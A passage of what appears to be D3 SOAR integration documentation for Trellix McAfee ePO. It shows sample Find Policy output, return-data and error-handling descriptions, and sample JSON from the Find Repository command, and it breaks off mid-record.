\\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META_FW\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"MCPSRVER1000\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\"\\r\\n \\r\\n ]\"",
    "featureName": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Assessment\\\",\\r\\n \\r\\n  \\\"Common Appliance Management\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\"Firewall\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\" Policy Category\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Agent\\\",\\r\\n \\r\\n  \\\"McAfee Client Proxy\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\"\\r\\n \\r\\n ]\"",
    "objectId": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "objectName": "\"\\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default DLP Policy\\\",\\r\\n \\r\\n  \\\"My Default Server Configuration\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default (DC2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim-2)\\\",\\r\\n \\r\\n  \\\"My Default (DC2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default(Tim)(2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default (Tim) (2)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\",\\r\\n \\r\\n  \\\"My Default\\\",\\r\\n \\r\\n  \\\"My Default (Tim)\\\"\\r\\n \\r\\n ]\"",
    "objectNotes": "\"\\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\",\\r\\n \\r\\n  \\\"\\\"\\r\\n \\r\\n ]\"",
    "productId": "\"[\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"MARCOBA_META\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"assessment\\\",\\r\\n \\r\\n  \\\"MCA_____1000\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"UDLPSRVR2013\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"DLPPS___1000\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"TIEClientMETA\\\",\\r\\n \\r\\n  \\\"ENDP_GS_1000\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_FW_META\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"ENDP_WP_1000\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"EPOAGENTMETA\\\",\\r\\n \\r\\n  \\\"MCPSRVER1000\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLBROKRMETA\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"DXLCLNT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"TIEMGMT_META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"MVEDR___META\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\",\\r\\n \\r\\n  \\\"TELEMTRY1000\\\"\\r\\n \\r\\n ]\"",
    "productName": "\"[\\r\\n \\r\\n  \\\"Active Response 2.4.0\\\",\\r\\n \\r\\n  \\\"Active Response 2.4.0\\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Cloud Workload Security \\\",\\r\\n \\r\\n  \\\"Common Appliance Management 1.1.0\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention 11.2\\\",\\r\\n \\r\\n  \\\"Data Loss Prevention 11.2\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"DLP Appliance Management 11.1.0\\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Adaptive Threat Protection \\\",\\r\\n \\r\\n  \\\"Endpoint Security Common \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Firewall \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"Endpoint Security Web Control \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Agent \\\",\\r\\n \\r\\n  \\\"McAfee Client Proxy 2.3.5\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Broker Management 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee DXL Client 5.0.1\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server Management 2.3.0\\\",\\r\\n \\r\\n  \\\"McAfee Threat Intelligence Exchange Server Management 2.3.0\\\",\\r\\n \\r\\n  \\\"MVISION EDR \\\",\\r\\n \\r\\n  \\\"MVISION EDR \\\",\\r\\n \\r\\n  \\\"Product Improvement Program \\\",\\r\\n \\r\\n  \\\"Product Improvement Program \\\"\\r\\n \\r\\n ]\"",
    "typeId": "\"[\\r\\n \\r\\n  *****,\\r\\n \\r\\n  ***** ]\"",
    "typeName": "\"[\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"Assessment Rules - Firewall\\\",\\r\\n \\r\\n  \\\"Assessment Rules - General\\\",\\r\\n \\r\\n  \\\"Auto-Remediation Settings\\\",\\r\\n \\r\\n  \\\"Assessment Rules - Container\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"DLP Policy\\\",\\r\\n \\r\\n  \\\"Server Configuration\\\",\\r\\n \\r\\n  \\\"General \\\",\\r\\n \\r\\n  \\\"McAfee DLP Prevent Email Settings\\\",\\r\\n \\r\\n  \\\"McAfee DLP Capture Settings\\\",\\r\\n \\r\\n  \\\"Users and Groups\\\",\\r\\n \\r\\n  \\\"McAfee DLP Prevent Web Settings\\\",\\r\\n \\r\\n  \\\"McAfee DLP Monitor Settings\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Dynamic Application Containment\\\",\\r\\n \\r\\n  \\\"Dynamic Application Containment\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"Rules\\\",\\r\\n \\r\\n  \\\"On-Access Scan\\\",\\r\\n \\r\\n  \\\"On-Access Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Access Protection\\\",\\r\\n \\r\\n  \\\"Access Protection\\\",\\r\\n \\r\\n  \\\"Exploit Prevention\\\",\\r\\n \\r\\n  \\\"Exploit Prevention\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Options\\\",\\r\\n \\r\\n  \\\"Enforcement Messaging\\\",\\r\\n \\r\\n  \\\"Enforcement Messaging\\\",\\r\\n \\r\\n  \\\"Block and Allow List\\\",\\r\\n \\r\\n  \\\"Block and Allow List\\\",\\r\\n \\r\\n  \\\"Content Actions\\\",\\r\\n \\r\\n  \\\"Content Actions\\\",\\r\\n \\r\\n  \\\"Browser Control\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"Repository\\\",\\r\\n \\r\\n  \\\"Troubleshooting\\\",\\r\\n \\r\\n  \\\"Product Improvement Program\\\",\\r\\n \\r\\n  \\\"Custom Properties\\\",\\r\\n \\r\\n  \\\"MCP Policy\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"TIE Server Settings\\\",\\r\\n \\r\\n  \\\"TIE Server Settings\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\",\\r\\n \\r\\n  \\\"General\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

productId

featureName

typeName

objectName

typeId

featureId

objectId

productName

objectNotes

MARCOBA_META

MARCOBA_META

General

My Default

***

MARCOBA_META

***

Active Response 2.4.1

MARCOBA_META

MARCOBA_META

General

My Default (Tim-2)

***

MARCOBA_META

***

Active Response 2.4.1

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

Find Policy failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

Find Policy failed.

Status Code: 401.

Message: Unauthorized.

Find Repository

Retrieves an ePO repository based on the provided search text.

Input

Input Parameter

Required/Optional

Description

Example

Search Text

Optional

The search text defining the condition to retrieve a repository.

3

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "*****-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"mirror\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 4,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"FTPSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 1,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"McAfeeFtp\\\",\\r\\n        \\\"spipeServerName\\\": null,\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 21,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": 